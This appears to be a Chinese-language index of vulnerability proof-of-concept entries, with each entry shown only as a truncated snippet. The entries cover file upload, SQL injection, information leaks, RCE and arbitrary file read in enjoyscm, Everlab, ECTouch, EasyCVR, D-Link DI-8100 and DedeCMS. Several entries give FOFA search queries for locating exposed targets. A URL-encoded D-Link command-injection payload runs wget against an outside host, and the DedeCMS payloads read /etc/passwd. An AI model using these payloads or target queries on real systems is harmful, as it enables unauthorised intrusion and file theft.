E4-1Enjoyscm-供应链管理系统-文件上传 漏洞描述: enjoyscm供应链管理系统 UploadFile接口处存在任意文件上传漏洞,攻击者可上传恶意木马获取服务器权限。 网络测绘: fofa语法: body=“供应商网上服务厅” 漏洞复现: payload1: POST /File/Up
E3-1Everlab-Catalog-经销商管理系统-文件上传 漏洞描述: Everlab-Catalog经销商管理系统 /Util/UploadApi接口处存在任意文件上传漏洞,未经授权的攻击者可上传任意后门文件,进而控制整个服务器。 网站图片: 网络测绘: fofa语法: 钟馗之眼:app:“
E2-1ECTouch-电商微信小程序-SQL 漏洞描述: ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进
E1-1EasyCVR-视频管理平台-InformationLeakage 漏洞描述: EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。 网站图片:
D21-1D-LINK-DI-8100-RCE 漏洞复现: payload: /msp_info.html?flag=cmd&cmd=%31%31%60%77%67%65%74%20%68%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%32%3a%39%3
D20-4DedeCMS–任意文件读取 漏洞描述: 需前台注册用户权限。 漏洞复现: payload: http://ip/dede/sys_verifies.php?action=view&filename=././/etc/passwd
D20-3DedeCMS–任意文件读取 漏洞复现: payload: /dede/sys_verifies.php?action=view&filename=././/etc/passwd
D20-2DedeCMS-RCE 漏洞描述: DedeCMS V5.7.114存在远程代码执行漏洞。产生该漏洞的原因是,虽然article_template_rand.php对编辑的文件进行了一定的限制,但攻击者仍然可以绕过这些限制并以某种方式编写代码,从而允许经过身份验证的攻击者利用该漏洞执行任意
D19-1DT-高清车牌识别摄像机-任意文件读取 漏洞描述: DT-高清车牌识别摄像机 存在目录遍历致任意文件读取漏洞,未经身份验证的远程攻击者可以读取系统内部敏感配置文件,获取服务器信息,导致系统处于极不安全的状态。 网站图片: fofa语法: app=“DT-高清车牌识别摄像机” 漏洞复现: p
D20-1DedeCMS-RCE 漏洞描述: DedeCMS V5.7.114存在远程代码执行漏洞。产生该漏洞的原因是,虽然sys_verizes.php对编辑的文件进行了一定的限制,但攻击者仍然可以绕过这些限制并以某种方式编写代码,从而允许经过身份验证的攻击者利用该漏洞执行任意命令并获得系统权限。
